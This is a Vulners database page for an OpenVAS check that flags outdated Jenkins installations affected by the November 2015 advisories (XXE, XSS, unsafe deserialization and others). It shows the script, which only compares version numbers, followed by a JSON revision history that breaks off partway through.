Search...

Jenkins Multiple Vulnerabilities - Nov15 (Linux)

2016-08-05T00:00:00

ID OPENVAS:1361412562310808269
Type openvas
Reporter Copyright (C) 2016 Greenbone Networks GmbH
Modified 2019-10-17T00:00:00

Description

This host is installed with Jenkins and is prone to multiple vulnerabilities.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Jenkins Multiple Vulnerabilities - Nov15 (Linux)
#
# Authors:
# Rinu Kuriakose &lt;krinu@secpod.com&gt;
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

CPE = "cpe:/a:jenkins:jenkins";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.808269");
  script_version("2019-10-17T11:27:19+0000");
  script_cve_id("CVE-2015-5317", "CVE-2015-5318", "CVE-2015-5319", "CVE-2015-5320",
                "CVE-2015-5321", "CVE-2015-5322", "CVE-2015-5323", "CVE-2015-5324",
                "CVE-2015-5325", "CVE-2015-5326", "CVE-2015-8103", "CVE-2015-7536",
                "CVE-2015-7537", "CVE-2015-7538", "CVE-2015-7539");
  script_bugtraq_id(77572, 77570, 77574, 77636, 77619);
  script_tag(name:"cvss_base", value:"7.6");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)");
  script_tag(name:"creation_date", value:"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)");

  script_name("Jenkins Multiple Vulnerabilities - Nov15 (Linux)");

  script_tag(name:"summary", value:"This host is installed with
  Jenkins and is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");

  script_tag(name:"insight", value:"Multiple flaws are due to,

  - An error in 'Fingerprints' pages.

  - The usage of publicly accessible salt to generate CSRF protection tokens.

  - The XML external entity (XXE) vulnerability in the create-job CLI command.

  - An improper verification of the shared secret used in JNLP slave
    connections.

  - An error in sidepanel widgets in the CLI command overview and help
    pages.

  - The directory traversal vulnerability in while requesting jnlpJars.

  - An improper restriction on access to API tokens.

  - The cross-site scripting vulnerability in the slave overview page.

  - The unsafe deserialization in Jenkins remoting.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to obtain sensitive information, bypass the protection mechanism,
  gain elevated privileges, bypass intended access restrictions and execute
  arbitrary code.");

  script_tag(name:"affected", value:"All Jenkins main line releases up to and including 1.637,
  all Jenkins LTS releases up to and including 1.625.1.");

  script_tag(name:"solution", value:"Jenkins main line users should update to 1.638,
  Jenkins LTS users should update to 1.625.2.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_banner_unreliable");

  script_xref(name:"URL", value:"https://jenkins.io/security/advisory/2015-11-11/");
  script_xref(name:"URL", value:"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/");
  script_xref(name:"URL", value:"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability");

  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_jenkins_consolidation.nasl", "os_detection.nasl");
  script_mandatory_keys("jenkins/detected", "Host/runs_unixoide");

  exit(0);
}

include("host_details.inc");
include("version_func.inc");

if(!port = get_app_port(cpe:CPE))
  exit(0);

if(!infos = get_app_full(cpe:CPE, port:port))
  exit(0);

if(!version = infos["version"])
  exit(0);

location = infos["location"];
proto = infos["proto"];

if(get_kb_item("jenkins/" + port + "/is_lts")) {
  if(version_is_less(version:version, test_version:"1.625.2")) {
    vuln = TRUE;
    fix = "1.625.2";
  }
} else {
  if(version_is_less(version:version, test_version:"1.638")) {
    vuln = TRUE;
    fix = "1.638";
  }
}

if(vuln) {
  report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);
  security_message(port:port, data:report, proto:proto);
  exit(0);
}

exit(99);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310808269", "bulletinFamily": "scanner", "title": "Jenkins Multiple Vulnerabilities - Nov15 (Linux)", "description": "This host is installed with\n Jenkins and is prone to multiple vulnerabilities.", "published": "2016-08-05T00:00:00", "modified": "2019-10-17T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/", "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", "https://jenkins.io/security/advisory/2015-11-11/"], "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "type": "openvas", "lastseen": "2019-10-18T15:24:34", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-16T21:23:49", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5326", "CVE-2015-5325"], "type": "cve"}, {"idList": ["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": "exploitdb"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, {"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"modified": "2019-10-16T21:23:49", "value": 7.2, "vector": "NONE"}}, "hash": "8490401c1573a14200a8497d66c78c64962b84bfdb4e9edff601d8b4a99d71a1", "hashmap": [{"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "dd9b4b24b1a373330409187d442ddec2", "key": "title"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "9c347b2bb345bb324195d4843abd9088", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "51576b010aab228499057cea5ee65aa4", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "e294c4a0771d09c68982383a48ce342f", "key": "modified"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2019-10-16T21:23:49", "modified": "2019-10-15T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/", "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", "https://jenkins.io/security/advisory/2015-11-11/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-10-15T07:48:22+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 07:48:22 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n if(version_is_less(version:version, test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "title": "CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)", "type": "openvas", "viewCount": 4}, "differentElements": ["description", "modified", "sourceData", "title"], "edition": 12, "lastseen": "2019-10-16T21:23:49"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 2, "enchantments": {"score": {"modified": "2017-10-25T14:43:07", "value": 5.4, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/"}}, "hash": "dbc92e93a2dfa407f530914c4fb3a907243b93f723207008f85273a1c5c52301", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "c5bb34af05c207ad0795b24b339835fb", "key": "modified"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "6c224556d4ac4c7795c0812479c6af87", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2017-10-25T14:43:07", "modified": "2017-10-24T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 7545 2017-10-24 11:45:30Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cloudbees:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 7545 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:45:30 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help of\n detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n - An error in 'Fingerprints' pages.\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n - An improper verification of the shared secret used in JNLP slave\n connections.\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n - The directory traversal vulnerability in while requesting jnlpJars.\n - An Improper restriction on access to API tokens.\n - The cross-site scripting vulnerability in the slave overview page.\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive informaion, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later. For more updates refer to https://www.cloudbees.com\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\",\"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\n## Code starts from here\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njenkinPort = \"\";\njenkinVer= \"\";\n\n## Get HTTP Port\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\n# Get Version\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\n## Check for vulnerable version\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\"))\n{\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-25T14:43:07"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-07-30T14:17:44", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5326", "CVE-2015-5325"], "type": "cve"}, {"idList": ["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": "exploitdb"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, {"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"modified": "2019-07-30T14:17:44", "value": 7.3, "vector": "NONE"}}, "hash": "9b610dcb15ec75e18bbfea8a87f428c19515a9c5253cbf9d003d1b25d0ff7e35", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "0cd4cd199638d4a2757220727b1edc2b", "key": "sourceData"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "9e2752354f7c58639c937a2a09780049", "key": "modified"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2019-07-30T14:17:44", "modified": "2019-07-30T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-07-30T03:00:13+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-30 03:00:13 +0000 (Tue, 30 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n 